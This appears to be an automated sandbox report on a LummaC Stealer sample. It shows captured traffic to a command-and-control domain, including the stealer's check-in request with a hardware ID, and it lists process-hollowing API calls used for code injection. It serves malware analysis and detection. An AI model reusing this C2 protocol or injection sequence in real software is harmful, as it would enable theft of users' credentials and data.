bf 1e 28 11 61 78 Data Ascii: +O\YV}+SU>0}C#ckj}z\])K#'lMl)(fyM\|8p]X~`$4BUky<,vwnn%N=jkd ~]FB?~JhHY6p>cq`f:wwnzfVM#^?5ir$n/~S(ax
2025-01-08 12:58:03 UTC	15331	OUT	Data Raw: b4 68 be 9a de 0d 60 e7 f1 50 01 b4 b2 c0 05 55 81 75 9f 3d 7f 09 81 cb 37 12 2b 71 39 e7 99 16 7c 51 46 fd b6 5e 42 6f 9c 08 6d ad 4c e9 f3 71 32 56 c4 3e 6c 5e be 59 5e 7b 28 2e 24 47 8c 22 08 de 4d b0 1a cc 02 05 df 08 6a af a6 5b 1c ba 8d c2 e5 9c eb 5a 15 5c c0 89 e1 0f 48 99 18 b6 17 a2 11 3e 22 b6 fe 31 9d fe 2d 8e 26 07 1d af 1b 74 44 c3 01 3c 97 4c 7f 5e 28 58 db c8 b8 32 d6 f2 68 6e 63 ba 20 d8 2b 33 b2 6c f3 a3 56 d4 70 a9 df 48 93 05 58 1b f0 6f ad d0 1f 8a f0 8f 81 18 f2 07 72 4f 05 bf bb 8d 18 d5 6b ff fe 51 ad ab 4d 51 ea 95 9c e3 d2 89 38 b6 ea d8 ba 2e 9a d6 93 7d fc 2f 4d 6e e2 d6 69 55 ec ba cc 7d 5f 79 70 65 e9 0d b3 f7 e9 25 1b ef 03 0b 05 05 37 2e cb 6a cf a8 83 d8 2e 15 c7 27 f4 6e c1 db 75 6d a3 3b e7 c3 84 35 a2 9a bd 3f 3f 0f 1e Data Ascii: h`PUu=7+q9\|QF^BomLq2V>l^Y^{(.$G"Mj[Z\H>"1-&tD<L^(X2hnc +3lVpHXorOkQMQ8.}/MniU}_ype%7.j.'num;5??
2025-01-08 12:58:03 UTC	15331	OUT	Data Raw: ed 96 e7 8f 75 60 ba 6c 9d ae 63 96 b4 22 32 df ec 57 7e 7b a4 4d 56 43 fc ba b3 fc 21 83 f3 d2 b9 d7 33 02 33 ab 52 1f c7 3d 2a 05 83 4d 9e 3b 9f dc 3f fc 28 7e 17 ca 21 fb cc 65 03 b0 d7 69 46 fe 59 4c b5 53 e5 31 65 e9 03 b7 7f ad 32 03 8a 99 bc 32 3d 99 65 c4 19 c2 10 8d b5 91 3f 66 fd 10 0a fa f4 34 bf 34 ed 62 c4 f6 97 24 e1 85 82 1b ec ee a1 04 73 04 f3 db fd a4 e7 fd 1a ff 22 0c d0 b7 4c 5f 14 bb d7 b6 1c f9 b9 5b f5 8c f2 da 91 7a 66 a5 ea 64 6e 92 d1 2f 1d 04 49 18 99 11 1c d1 fd ad f4 19 5c 75 0d 9c 39 06 0c 16 aa 93 b6 7f 08 b7 9c 1e ed 10 b8 35 b9 fd e6 da 00 13 e7 e2 fd 36 03 30 2b 3d b2 7f b0 b0 58 85 15 8b 33 5a aa 83 df 5e 3f 9b 52 75 d4 3d 72 34 32 5f 39 17 ac 44 28 b4 b1 7e ef 15 32 df 2d 05 38 c6 00 d2 35 1d 48 bf 6e 7f 4d 7e ea 3e f3 Data Ascii: u`lc"2W~{MVC!33R=*M;?(~!eiFYLS1e22=e?f44b$s"L_[zfdn/I\u9560+=X3Z^?Ru=r42_9D(~2-85HnM~>
2025-01-08 12:58:03 UTC	15331	OUT	Data Raw: 2a ac e7 68 99 e2 53 fe 29 41 64 50 05 72 43 f7 df 5b f5 9e fb 34 bc 93 31 9f e4 0d c6 a9 0c bb 16 e6 29 65 ac f2 55 72 ff 35 c6 f4 7e 06 a3 44 a1 b8 72 c0 f8 60 8f fd c6 9a d2 65 76 a8 66 4f c7 ff 46 e7 0b b4 a2 7f 8f 58 7a c8 df fc 4c f5 7f 87 f2 d3 a0 13 70 41 53 ba a8 08 38 72 40 04 7b fc a0 51 43 00 60 70 75 2c 17 9c f5 dd 16 43 cf 6c df eb 17 3a 33 d8 bf e1 f3 17 63 dc 4b 4f 38 ff c1 b1 9d e6 c9 2a c1 ca a9 a1 da 47 b3 5c 72 ba a8 8d 4c e7 ab b2 1f df 20 99 17 74 11 c6 02 70 d4 19 c4 ef 16 00 03 01 33 d7 17 f1 28 20 ff fb e1 c2 e4 bf b7 cf b6 5d 51 f1 94 83 8a 40 81 b8 b4 59 fb 41 e0 25 00 7d ff f3 68 b0 28 d3 fa ba 1d e5 ad 96 01 1a cc a6 90 ca c5 4e 93 70 7c 26 46 e2 33 01 ee 97 aa 10 31 9e bf 37 01 22 27 42 f0 9b c8 c4 43 c0 81 82 14 02 fc ed f1 Data Ascii: hS)AdPrC[41)eUr5~Dr`evfOFXzLpAS8r@{QC`pu,Cl:3cKO8G\rL tp3( ]Q@YA%}h(Np\|&F317"'BC
2025-01-08 12:58:03 UTC	15331	OUT	Data Raw: 22 37 05 d0 c5 12 47 c7 aa a2 9e 8b 42 91 5d a7 72 c4 28 82 48 a5 d9 a9 83 3e 1b 0e 54 e9 17 f4 db a9 ea 69 30 0a d6 fe 76 02 e8 1e 1a 2e 78 a5 14 b7 71 c1 9f a0 10 e1 cb 77 c1 68 7c 43 79 2e a2 73 3b 26 44 00 98 39 05 9e 7e 01 16 b0 10 b4 49 fd e5 44 76 b6 63 b9 ce 28 e0 18 f8 8b 83 41 b2 8b e8 2d f7 69 cc 09 b2 ae 60 5b 0b b7 c3 33 22 82 88 a1 49 10 f0 bc fa 58 8a 21 34 fa a5 8d 35 fa e4 7a 55 c7 b4 6c 44 74 42 39 4b ae ce b5 c1 c6 8f 69 38 54 1f 02 37 bb 31 16 47 3a 1e fe 53 2b 07 f7 80 c5 fb 62 5e 85 00 53 5a 6c 62 fb cc 7f 98 ee 23 33 7f 9a dd 69 27 13 03 96 b5 20 59 7a fa 24 44 7e f4 38 46 05 35 c0 2b bc 59 99 8e e5 b6 6d ff b6 e2 3b ff 77 27 f8 5b 31 c6 83 ad b4 78 08 68 f7 1b 74 29 c0 ca f3 bb 07 7a 00 c3 c6 e4 4f 85 31 97 42 e5 cb fd d3 87 86 cf Data Ascii: "7GB]r(H>Ti0v.xqwh\|Cy.s;&D9~IDvc(A-i`[3"IX!45zUlDtB9Ki8T71G:S+b^SZlb#3i' Yz$D~8F5+Ym;w'[1xht)zO1B
2025-01-08 12:58:13 UTC	180	IN	HTTP/1.1 502 Bad Gateway Server: cloudflare Date: Wed, 08 Jan 2025 12:58:13 GMT Content-Type: text/html Content-Length: 557 Connection: close CF-RAY: 8fec5b5e69cf5e7e-EWR

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49748	104.21.4.114	443	7352	C:\Users\user\Desktop\Rgr8LJz.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 12:58:13 UTC	267	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 89 Host: cureprouderio.click
2025-01-08 12:58:13 UTC	89	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 50 6e 68 71 6f 2d 2d 6e 62 67 6e 78 64 6c 78 64 6e 79 6f 26 6a 3d 26 68 77 69 64 3d 41 39 33 34 46 46 34 38 42 46 42 42 33 39 34 41 32 39 36 36 35 33 45 30 44 30 44 41 44 41 39 39 Data Ascii: act=get_message&ver=4.0&lid=LPnhqo--nbgnxdlxdnyo&j=&hwid=A934FF48BFBB394A296653E0D0DADA99
2025-01-08 12:58:14 UTC	1127	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 12:58:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=9qjih0dfldrum9r7uk3jikt1de; expires=Sun, 04 May 2025 06:44:52 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mSo9Rr0OxdzXKqNWvCo%2BM8OaOZ6W0vMGLXe2ROrZ%2BBV2JOYzz%2Fpf55Dtwl4soHIbXoGnaZ0O6DtPmTAjoSQobMK%2BZ1ICBAFAPybGMZkPaz1xAh9WzsVtRtvx2E7SRwLPexY4JWIx"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fec5b9bbeae8c6c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2091&min_rtt=2090&rtt_var=787&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=992&delivery_rate=1388492&cwnd=168&unsent_bytes=0&cid=623cd09a1813199b&ts=493&x=0"
2025-01-08 12:58:14 UTC	242	IN	Data Raw: 63 34 34 0d 0a 41 75 61 34 78 46 5a 51 73 79 39 4d 64 39 59 77 79 39 45 4d 6f 71 49 70 2f 41 2f 43 34 59 30 70 48 31 57 66 43 43 6b 55 72 57 4a 5a 6e 5a 71 69 49 6e 4b 4a 48 6d 42 56 73 78 4c 78 34 43 43 41 78 67 76 47 4c 59 6d 44 74 41 4a 53 4a 4d 56 4d 47 58 62 5a 44 31 71 41 39 34 6f 73 42 59 46 47 49 68 2b 33 51 49 71 6c 51 64 4c 76 54 36 41 67 71 49 50 66 52 6d 39 73 32 56 78 77 57 63 41 77 61 64 50 70 6e 53 38 67 67 33 38 65 41 75 52 36 72 2b 6b 34 6b 65 78 39 6e 55 53 6e 70 2f 78 43 58 47 58 6d 59 31 46 49 67 6b 6c 50 6b 76 2b 74 4f 47 44 6c 59 53 73 4f 6a 48 4f 6d 6a 53 50 45 79 47 4b 52 58 76 75 6d 75 6e 4e 7a 5a 75 56 69 53 69 58 6a 44 58 4c 53 37 37 55 48 48 4f 64 6b 47 44 2b 4b 48 2f 2f 6a 50 4d 50 70 54 Data Ascii: c44Aua4xFZQsy9Md9Ywy9EMoqIp/A/C4Y0pH1WfCCkUrWJZnZqiInKJHmBVsxLx4CCAxgvGLYmDtAJSJMVMGXbZD1qA94osBYFGIh+3QIqlQdLvT6AgqIPfRm9s2VxwWcAwadPpnS8gg38eAuR6r+k4kex9nUSnp/xCXGXmY1FIgklPkv+tOGDlYSsOjHOmjSPEyGKRXvumunNzZuViSiXjDXLS77UHHOdkGD+KH//jPMPpT
2025-01-08 12:58:14 UTC	1369	IN	Data Raw: 36 31 38 38 4b 58 48 51 6c 56 6a 32 30 31 35 58 38 39 52 4d 4b 37 69 6a 47 4d 32 2f 32 30 4e 4d 4b 77 43 38 72 39 51 6a 63 4e 67 6a 55 47 67 75 66 31 41 54 52 48 58 61 32 4e 34 31 7a 55 77 76 76 6d 77 4d 6a 37 4c 56 78 51 66 76 48 65 67 34 46 6e 37 6b 6b 65 64 50 59 69 67 2b 32 34 30 4d 4b 64 53 52 47 44 4b 41 56 53 36 6c 2b 38 62 61 65 74 57 49 6b 65 52 66 71 44 6a 56 75 43 52 63 62 70 6a 6c 59 7a 63 45 46 68 69 78 57 51 61 62 73 63 78 4d 36 6a 58 69 47 34 30 77 6d 34 32 49 35 31 6a 67 34 30 6a 6c 70 41 5a 72 55 53 6b 73 39 67 62 57 78 2f 30 51 30 67 74 68 69 39 7a 76 4f 7a 30 4e 43 54 65 64 79 6f 34 6d 45 71 65 34 32 58 49 79 6b 6a 4a 54 72 61 73 2f 57 52 44 65 73 4d 6e 51 33 58 56 44 58 4c 66 2f 70 41 50 48 64 35 2b 4f 67 48 6c 42 4c 4b 68 5a 2f 4c 77 Data Ascii: 6188KXHQlVj2015X89RMK7ijGM2/20NMKwC8r9QjcNgjUGguf1ATRHXa2N41zUwvvmwMj7LVxQfvHeg4Fn7kkedPYig+240MKdSRGDKAVS6l+8baetWIkeRfqDjVuCRcbpjlYzcEFhixWQabscxM6jXiG40wm42I51jg40jlpAZrUSks9gbWx/0Q0gthi9zvOz0NCTedyo4mEqe42XIykjJTras/WRDesMnQ3XVDXLf/pAPHd5+OgHlBLKhZ/Lw
2025-01-08 12:58:14 UTC	1369	IN	Data Raw: 58 57 31 30 55 73 4c 2f 56 72 47 46 72 43 45 6a 61 78 79 5a 55 61 42 50 68 37 42 43 76 35 42 50 6e 68 62 65 6e 45 65 36 6b 39 68 71 76 6d 59 6e 31 73 74 45 56 59 54 75 6c 53 59 4a 4c 56 6e 44 41 66 2f 56 55 5a 52 62 39 65 6f 37 42 38 34 39 5a 6b 6a 45 4b 6b 76 61 4a 44 66 51 66 77 65 42 42 53 2b 54 74 50 69 2b 6d 30 49 47 4f 48 56 6a 77 63 68 6d 4b 2b 34 31 62 47 6d 68 33 50 51 5a 61 41 78 6b 78 5a 4a 50 52 4c 47 57 33 47 47 6c 37 4a 6b 34 6f 69 46 39 70 42 66 43 47 59 56 37 4b 4c 54 38 2f 2b 42 70 70 6c 69 59 7a 63 45 46 68 69 78 57 51 61 62 73 63 42 4d 36 6a 58 74 47 49 48 77 6e 34 41 49 35 31 6b 67 34 30 6a 6c 70 41 5a 6e 55 53 6b 73 39 67 62 57 78 2f 30 51 30 73 74 68 69 39 7a 76 50 7a 30 4e 43 54 65 64 79 6f 34 6d 45 71 65 34 32 58 4d 79 6b 69 4d 54 Data Ascii: XW10UsL/VrGFrCEjaxyZUaBPh7BCv5BPnhbenEe6k9hqvmYn1stEVYTulSYJLVnDAf/VUZRb9eo7B849ZkjEKkvaJDfQfweBBS+TtPi+m0IGOHVjwchmK+41bGmh3PQZaAxkxZJPRLGW3GGl7Jk4oiF9pBfCGYV7KLT8/+BppliYzcEFhixWQabscBM6jXtGIHwn4AI51kg40jlpAZnUSks9gbWx/0Q0sthi9zvPz0NCTedyo4mEqe42XMykiMT
2025-01-08 12:58:14 UTC	167	IN	Data Raw: 6a 64 53 54 44 4a 32 4d 68 7a 7a 68 65 79 64 75 31 43 6e 2f 6e 61 52 59 69 6a 46 7a 34 71 32 76 4d 30 30 53 45 54 66 47 56 75 57 67 75 44 65 68 4d 59 55 69 43 56 69 6e 52 31 70 34 35 46 2b 74 36 4b 68 71 59 56 61 43 53 54 74 6a 34 47 63 38 32 6f 4c 32 69 58 56 77 78 2b 6b 35 63 4a 75 49 57 53 62 44 51 6e 44 78 6c 2f 78 6f 35 4e 4b 35 58 70 34 4e 4e 7a 38 5a 45 73 57 47 34 75 2f 68 43 51 33 72 73 54 78 35 77 7a 69 4e 79 69 65 2b 71 4d 47 4c 64 5a 6a 55 45 76 33 61 74 75 46 2f 6d 38 48 79 79 0d 0a Data Ascii: jdSTDJ2Mhzzheydu1Cn/naRYijFz4q2vM00SETfGVuWguDehMYUiCVinR1p45F+t6KhqYVaCSTtj4Gc82oL2iXVwx+k5cJuIWSbDQnDxl/xo5NK5Xp4NNz8ZEsWG4u/hCQ3rsTx5wziNyie+qMGLdZjUEv3atuF/m8Hyy
2025-01-08 12:58:14 UTC	1369	IN	Data Raw: 32 61 39 63 0d 0a 54 72 44 5a 79 6d 38 74 59 50 74 52 5a 55 4f 66 57 6a 62 51 37 36 77 67 61 5a 68 71 49 41 4c 76 52 66 76 6b 53 73 48 76 53 70 5a 44 67 39 58 30 62 6e 6b 77 38 45 31 62 57 64 64 58 4f 36 36 4e 6c 44 70 68 33 55 6f 61 4a 65 46 46 2b 4b 42 6e 2b 4d 6c 35 72 31 79 32 72 62 31 36 52 57 44 34 4f 56 42 5a 33 79 74 79 6c 63 43 6c 44 42 48 41 59 52 77 68 34 31 36 46 69 47 76 31 31 68 43 36 57 35 75 73 34 48 74 50 42 64 35 42 58 32 54 6f 4c 47 48 53 2f 35 55 35 45 74 51 62 66 6a 43 79 55 59 71 62 50 73 37 4a 66 4c 70 61 38 5a 43 6d 65 58 67 43 39 6e 31 72 65 2f 73 33 4b 59 50 57 71 42 63 54 32 30 34 39 4d 72 78 64 76 72 4e 61 6b 64 68 74 6d 32 4f 41 32 65 35 64 58 67 54 4d 62 31 30 6c 33 6c 63 36 72 49 71 44 4d 47 62 72 46 68 55 72 2b 58 54 34 67 Data Ascii: 2a9cTrDZym8tYPtRZUOfWjbQ76wgaZhqIALvRfvkSsHvSpZDg9X0bnkw8E1bWddXO66NlDph3UoaJeFF+KBn+Ml5r1y2rb16RWD4OVBZ3ytylcClDBHAYRwh416FiGv11hC6W5us4HtPBd5BX2ToLGHS/5U5EtQbfjCyUYqbPs7JfLpa8ZCmeXgC9n1re/s3KYPWqBcT2049MrxdvrNakdhtm2OA2e5dXgTMb10l3lc6rIqDMGbrFhUr+XT4g
2025-01-08 12:58:14 UTC	1369	IN	Data Raw: 7a 72 32 75 70 75 4c 70 4b 56 77 33 48 57 56 78 53 32 67 46 49 6f 73 79 63 4f 7a 2f 4a 46 77 63 57 35 33 61 63 70 6d 65 56 37 42 32 76 56 59 61 4d 2b 6d 5a 44 65 75 35 34 45 46 76 70 42 6a 62 51 7a 59 4d 5a 42 64 70 34 50 69 57 6d 63 36 53 41 51 50 62 53 59 62 64 4c 6f 34 6a 6d 41 6c 59 41 71 56 74 6a 4c 4a 38 41 61 61 2f 69 37 78 73 68 30 52 63 48 49 6f 56 71 70 4c 6f 39 6c 65 39 62 74 6d 75 6d 73 50 74 35 52 52 6e 4a 57 48 38 68 77 79 78 62 67 65 2b 77 62 78 62 6e 64 67 45 61 68 55 47 74 76 6b 2f 61 2b 30 76 46 58 4b 53 37 2f 30 78 53 44 4c 51 39 65 53 4b 64 45 6c 65 51 79 4f 38 4f 4f 2f 74 48 4b 6a 58 6a 58 71 71 56 59 4a 66 79 62 70 6c 33 72 37 58 64 5a 33 73 6e 32 57 55 61 55 75 63 6d 5a 4a 2f 4b 67 7a 45 2b 33 47 56 30 45 70 56 53 76 4c 56 47 38 35 Data Ascii: zr2upuLpKVw3HWVxS2gFIosycOz/JFwcW53acpmeV7B2vVYaM+mZDeu54EFvpBjbQzYMZBdp4PiWmc6SAQPbSYbdLo4jmAlYAqVtjLJ8Aaa/i7xsh0RcHIoVqpLo9le9btmumsPt5RRnJWH8hwyxbge+wbxbndgEahUGtvk/a+0vFXKS7/0xSDLQ9eSKdEleQyO8OO/tHKjXjXqqVYJfybpl3r7XdZ3sn2WUaUucmZJ/KgzE+3GV0EpVSvLVG85
2025-01-08 12:58:14 UTC	1369	IN	Data Raw: 6a 34 7a 66 65 55 38 55 31 6a 67 52 66 2b 4d 42 4b 64 54 70 71 78 51 33 39 32 30 56 4b 2f 6c 38 67 59 4d 38 35 65 73 59 6c 57 53 36 68 38 35 4e 64 77 47 73 65 55 42 69 36 41 52 4a 69 34 47 64 62 69 58 5a 47 79 59 51 37 77 53 46 73 47 4c 4f 36 45 4f 78 50 6f 79 4f 2f 57 39 4d 4d 4e 5a 2b 59 56 44 35 56 44 53 68 6b 35 41 2f 4a 2f 70 6b 50 54 33 75 41 36 58 6e 53 65 71 52 41 70 63 33 74 4b 32 39 65 6b 56 6b 37 69 4e 5a 49 73 34 77 58 73 6e 79 38 44 38 63 38 6c 77 43 4a 37 77 46 6d 37 73 35 37 2b 46 4f 74 7a 36 30 71 65 35 45 54 6a 6a 63 51 46 46 42 35 46 5a 53 67 2b 6a 7a 42 44 4f 4c 47 33 30 34 76 41 61 4b 74 54 32 55 31 33 6d 57 54 4c 61 35 39 55 46 52 50 4d 63 78 5a 53 50 6f 4d 33 65 74 6b 36 4d 6a 44 4a 78 4e 4a 6b 53 38 57 66 4c 6c 51 66 54 59 58 63 35 Data Ascii: j4zfeU8U1jgRf+MBKdTpqxQ3920VK/l8gYM85esYlWS6h85NdwGseUBi6ARJi4GdbiXZGyYQ7wSFsGLO6EOxPoyO/W9MMNZ+YVD5VDShk5A/J/pkPT3uA6XnSeqRApc3tK29ekVk7iNZIs4wXsny8D8c8lwCJ7wFm7s57+FOtz60qe5ETjjcQFFB5FZSg+jzBDOLG304vAaKtT2U13mWTLa59UFRPMcxZSPoM3etk6MjDJxNJkS8WfLlQfTYXc5
2025-01-08 12:58:14 UTC	1369	IN	Data Raw: 6b 74 4e 4f 75 39 41 47 43 66 31 4c 6c 57 31 79 61 49 65 4b 49 63 66 4b 78 6d 7a 64 49 33 69 58 63 7a 6e 59 6f 35 31 72 73 72 56 63 31 6f 77 7a 33 35 6a 54 76 55 45 51 4e 4f 4c 70 51 49 6f 67 46 35 35 4d 5a 46 69 67 4b 46 4e 37 2f 64 4e 78 58 36 50 69 2b 6c 49 53 68 2b 73 59 6b 6f 6c 34 77 31 79 30 4f 36 53 4f 32 62 64 5a 6a 34 2b 34 6c 61 4b 70 46 61 54 31 78 32 52 53 4b 36 31 76 56 68 30 41 36 70 59 65 6c 4c 66 4c 6d 6d 31 34 72 41 67 41 2f 41 66 4b 78 71 2f 58 72 76 6f 5a 63 76 45 48 5a 42 4f 70 4c 32 69 55 30 6b 62 35 32 34 61 55 74 6b 55 5a 71 7a 4a 72 32 39 6d 68 56 63 55 52 37 68 56 68 49 5a 44 79 2b 5a 68 74 6b 36 41 73 37 31 4e 4b 47 4c 53 52 6e 78 77 36 54 4a 44 70 4d 4b 78 5a 43 4c 70 48 44 34 36 6e 77 6e 2b 6f 6c 37 67 78 55 72 4f 66 2f 75 76 Data Ascii: ktNOu9AGCf1LlW1yaIeKIcfKxmzdI3iXcznYo51rsrVc1owz35jTvUEQNOLpQIogF55MZFigKFN7/dNxX6Pi+lISh+sYkol4w1y0O6SO2bdZj4+4laKpFaT1x2RSK61vVh0A6pYelLfLmm14rAgA/AfKxq/XrvoZcvEHZBOpL2iU0kb524aUtkUZqzJr29mhVcUR7hVhIZDy+Zhtk6As71NKGLSRnxw6TJDpMKxZCLpHD46nwn+ol7gxUrOf/uv
2025-01-08 12:58:14 UTC	1369	IN	Data Raw: 66 4c 57 6e 4e 43 2f 43 64 7a 6f 2b 2b 78 45 67 62 43 58 7a 77 5a 6e 58 4b 46 34 55 33 61 77 46 36 6c 61 36 71 4a 32 46 35 63 41 71 78 6b 66 6e 6a 75 42 6a 62 56 39 70 41 33 47 39 5a 6f 4c 68 75 52 41 37 2b 32 4a 35 58 54 54 5a 55 35 39 49 36 38 57 56 41 64 71 55 31 4b 64 65 6f 51 56 74 62 52 6f 47 38 54 68 48 55 34 4a 72 39 56 76 4b 6c 4f 30 50 42 59 76 6e 36 54 72 64 6c 47 54 32 79 6e 53 6e 4e 54 2b 56 42 54 71 66 57 52 4d 69 54 39 48 51 67 57 6b 30 58 2b 6d 32 4b 4a 35 30 65 49 52 4b 61 45 2f 58 31 75 49 50 64 4f 47 31 2f 6a 49 47 75 79 77 5a 4a 6a 50 76 31 32 4b 79 43 69 43 59 32 46 56 65 2f 50 65 70 56 32 38 4c 48 64 5a 57 55 7a 30 46 70 63 51 38 67 6d 4e 62 66 75 69 78 41 64 35 57 6f 6a 52 2b 4e 63 76 4f 46 61 78 75 73 51 74 6b 65 75 6d 50 78 66 54 Data Ascii: fLWnNC/Cdzo++xEgbCXzwZnXKF4U3awF6la6qJ2F5cAqxkfnjuBjbV9pA3G9ZoLhuRA7+2J5XTTZU59I68WVAdqU1KdeoQVtbRoG8ThHU4Jr9VvKlO0PBYvn6TrdlGT2ynSnNT+VBTqfWRMiT9HQgWk0X+m2KJ50eIRKaE/X1uIPdOG1/jIGuywZJjPv12KyCiCY2FVe/PepV28LHdZWUz0FpcQ8gmNbfuixAd5WojR+NcvOFaxusQtkeumPxfT

Target ID:	0
Start time:	07:57:54
Start date:	08/01/2025
Path:	C:\Users\user\Desktop\Rgr8LJz.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Rgr8LJz.exe"
Imagebase:	0xc90000
File size:	347'648 bytes
MD5 hash:	20155323669FD610A0C7201BE666FBD6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.1810621021.0000000004089000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	07:57:54
Start date:	08/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	07:57:54
Start date:	08/01/2025
Path:	C:\Users\user\Desktop\Rgr8LJz.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\Rgr8LJz.exe"
Imagebase:	0x420000
File size:	347'648 bytes
MD5 hash:	20155323669FD610A0C7201BE666FBD6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	07:57:54
Start date:	08/01/2025
Path:	C:\Users\user\Desktop\Rgr8LJz.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Rgr8LJz.exe"
Imagebase:	0x6e0000
File size:	347'648 bytes
MD5 hash:	20155323669FD610A0C7201BE666FBD6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	07:57:54
Start date:	08/01/2025
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7276 -s 924
Imagebase:	0x380000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	12.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	33.3%
Total number of Nodes:	27
Total number of Limit Nodes:	2

Executed Functions

Function 03087F21 Relevance: 42.3, APIs: 11, Strings: 13, Instructions: 294
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,03087E93,03087E83), ref: 030880B9
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 030880CC
Wow64GetThreadContext.KERNEL32(00000098,00000000), ref: 030880EA
ReadProcessMemory.KERNELBASE(00000090,?,03087ED7,00000004,00000000), ref: 0308810E
VirtualAllocEx.KERNELBASE(00000090,?,?,00003000,00000040), ref: 03088139
TerminateProcess.KERNELBASE(00000090,00000000), ref: 03088158
WriteProcessMemory.KERNELBASE(00000090,00000000,?,?,00000000,?), ref: 03088191
WriteProcessMemory.KERNELBASE(00000090,00400000,?,?,00000000,?,00000028), ref: 030881DC
WriteProcessMemory.KERNELBASE(00000090,?,?,00000004,00000000), ref: 0308821A
Wow64SetThreadContext.KERNEL32(00000098,05500000), ref: 03088256
ResumeThread.KERNELBASE(00000098), ref: 03088265

Strings

WriteProcessMemory, xrefs: 03088034
ress, xrefs: 03087FAB
SetThreadContext, xrefs: 03088047
CreateProcessW, xrefs: 03087FD5
ReadProcessMemory, xrefs: 0308800E
TerminateProcess, xrefs: 03088148
Load, xrefs: 03087F5F
GetP, xrefs: 03087FA3
aryA, xrefs: 03087F67
VirtualAlloc, xrefs: 03087FE8
GetThreadContext, xrefs: 03087FFB
VirtualAllocEx, xrefs: 03088021
ResumeThread, xrefs: 0308805D

Memory Dump Source

Source File: 00000000.00000002.1810594704.0000000003087000.00000040.00000800.00020000.00000000.sdmp, Offset: 03087000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3087000_Rgr8LJz.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResumeTerminate
String ID: CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
API String ID: 2440066154-232383841
Opcode ID: 956aea2136c6b0205ab5bf3fe1e0123e9091b05b22cf94d50ecc47fa332fbd9d
Instruction ID: 5f6fef75d19d617d5869f2ea6916595d3d27233f34015633e98c02135db1f09f
Opcode Fuzzy Hash: 956aea2136c6b0205ab5bf3fe1e0123e9091b05b22cf94d50ecc47fa332fbd9d
Instruction Fuzzy Hash: A8B1187660124AAFDB60CF68CC80BDA73A5FF88714F158564EA1CAB341D770FA41CB94

Function 0308809E Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 82
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,03087E93,03087E83), ref: 030880B9
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 030880CC
Wow64GetThreadContext.KERNEL32(00000098,00000000), ref: 030880EA
ReadProcessMemory.KERNELBASE(00000090,?,03087ED7,00000004,00000000), ref: 0308810E
VirtualAllocEx.KERNELBASE(00000090,?,?,00003000,00000040), ref: 03088139
TerminateProcess.KERNELBASE(00000090,00000000), ref: 03088158
